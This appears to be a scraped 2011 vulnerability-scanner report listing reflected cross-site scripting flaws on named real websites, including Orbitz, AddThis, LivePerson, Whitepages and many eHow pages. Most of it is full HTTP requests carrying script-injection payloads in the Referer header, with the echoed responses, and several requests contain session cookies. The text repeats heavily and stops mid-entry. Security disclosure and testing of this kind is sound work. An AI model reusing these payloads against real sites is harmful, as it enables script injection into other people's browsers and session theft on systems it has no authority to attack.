This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /lab/innerfade/ HTTP/1.1 Host: medienfreunde.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: b2932"><script>alert(1)</script>4fce17b3452
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 14:32:25 GMT Server: Apache X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 14717
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de"> <!-- saved from url=(0013)about:internet --> <hea ...[SNIP]... <iframe src="http://pingomatic.com/ping/?title=Flyer&blogurl=b2932"><script>alert(1)</script>4fce17b3452&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb9d2</script><script>alert(1)</script>f66207f6f2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: msn.whitepages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=fb9d2</script><script>alert(1)</script>f66207f6f2c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40b07'-alert(1)-'d5a8a9aeffc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=40b07'-alert(1)-'d5a8a9aeffc
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:41:27 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Content-Length: 3686 Content-Type: text/html Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3D40b07%27%2Dalert%281%29%2D%27d5a8a9aeffc; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=MHEFFOICFMALHBAGDLCEHAGC; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head>
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2a26"><script>alert(1)</script>4e16ea664ee was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: updates.orbitz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=e2a26"><script>alert(1)</script>4e16ea664ee
Response
HTTP/1.1 200 OK Server: nginx/0.6.35 Date: Wed, 02 Feb 2011 15:42:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Set-Cookie: traveler_update_visitor=B704221B7BC5130; path=/; expires=Tue, 02 Feb 2016 15:42:40 GMT Set-Cookie: traveler_update_session=BAh7CToOcmV0dXJuX3RvIgYvOhFsYXN0X3JlcXVlc3RABjoQbGFzdF92aWV3%250AZWRABiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7AA%253D%253D--1848cb98c769e595ff92d0c71ba7b529ea2e7b8c; path=/ Status: 200 OK X-Runtime: 0.05162 ETag: "e3805ab73252db7f49504ae9518d880e" Cache-Control: private, max-age=0, must-revalidate Content-Length: 32775
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c422"><script>alert(1)</script>79e384fb3bc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /flight_status HTTP/1.1 Host: updates.orbitz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6c422"><script>alert(1)</script>79e384fb3bc
Response
HTTP/1.1 200 OK Server: nginx/0.6.35 Date: Wed, 02 Feb 2011 15:42:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Set-Cookie: traveler_update_visitor=ED7A2C9950CD932; path=/; expires=Tue, 02 Feb 2016 15:42:42 GMT Set-Cookie: traveler_update_session=BAh7CToOcmV0dXJuX3RvIhMvZmxpZ2h0X3N0YXR1czoRbGFzdF9yZXF1ZXN0%250AQAY6EGxhc3Rfdmlld2VkQAYiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6%250AOkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%253D--2e47e384fcf267e3ac43c1147866adf06a386ff2; path=/ Status: 200 OK X-Runtime: 0.01426 ETag: "50fd0e0e1c4599312e9b792d296674b6" Cache-Control: private, max-age=0, must-revalidate Content-Length: 20517
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc7c2"><script>alert(1)</script>4d661957df4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /bookmark.php HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=cc7c2"><script>alert(1)</script>4d661957df4
Response
HTTP/1.1 200 OK Date: Tue, 01 Feb 2011 15:38:34 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/ Content-Length: 94428
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookm ...[SNIP]... <input type="hidden" id="url" name="url" value="http://www.google.com/search?hl=en&q=cc7c2"><script>alert(1)</script>4d661957df4" /> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4484</script><script>alert(1)</script>1cc7f90f443 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.ehow.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=f4484</script><script>alert(1)</script>1cc7f90f443
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow | How To Do Just About Everything! | How To ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20a6f</script><script>alert(1)</script>bf656815b44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /MailingList.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=20a6f</script><script>alert(1)</script>bf656815b44
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:28 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 31410
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>eHow of the Day | eHow.com</title> <meta chars ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94767</script><script>alert(1)</script>72faf05749a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_us/about_us.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=94767</script><script>alert(1)</script>72faf05749a
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:59 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 32688
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fdb2f</script><script>alert(1)</script>413feb209a8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_us/contact_us.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=fdb2f</script><script>alert(1)</script>413feb209a8
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:59 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 31984
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cd7d</script><script>alert(1)</script>84ee8a351de was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_us/faq_ehow.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=8cd7d</script><script>alert(1)</script>84ee8a351de
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:00 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49896
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7e8b6</script><script>alert(1)</script>e22c3df7afd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /about_us/link_to_us.aspx HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=7e8b6</script><script>alert(1)</script>e22c3df7afd
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:58 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 31379
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Link to eHow | eHow.com</title> <meta c ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3df8</script><script>alert(1)</script>1e4d372cf6c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ajax/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=e3df8</script><script>alert(1)</script>1e4d372cf6c
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:21 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 60925
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8239f</script><script>alert(1)</script>b9c8de16e0a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /arts-and-crafts/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=8239f</script><script>alert(1)</script>b9c8de16e0a
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:36 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72207
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Arts & Crafts - How To Information | eHow.com</ti ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b132</script><script>alert(1)</script>3c0febc8d3d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /arts-and-entertainment/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=7b132</script><script>alert(1)</script>3c0febc8d3d
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:35 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71928
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Arts & Entertainment - How To Information | eHow. ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1952</script><script>alert(1)</script>8a38f022236 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /at-home/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=e1952</script><script>alert(1)</script>8a38f022236
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:17:36 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49317
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> eHow Home Blog | eHow.com </title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3f97</script><script>alert(1)</script>8cdcd28db28 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /beauty-and-personal-care/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=c3f97</script><script>alert(1)</script>8cdcd28db28
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:12:36 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73789
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Beauty & Personal Care - How To Information | eHo ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da28b</script><script>alert(1)</script>c0d891d3e78 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
